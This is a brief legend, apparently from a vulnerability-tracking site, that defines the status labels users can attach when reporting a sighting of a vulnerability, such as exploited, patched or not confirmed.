- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…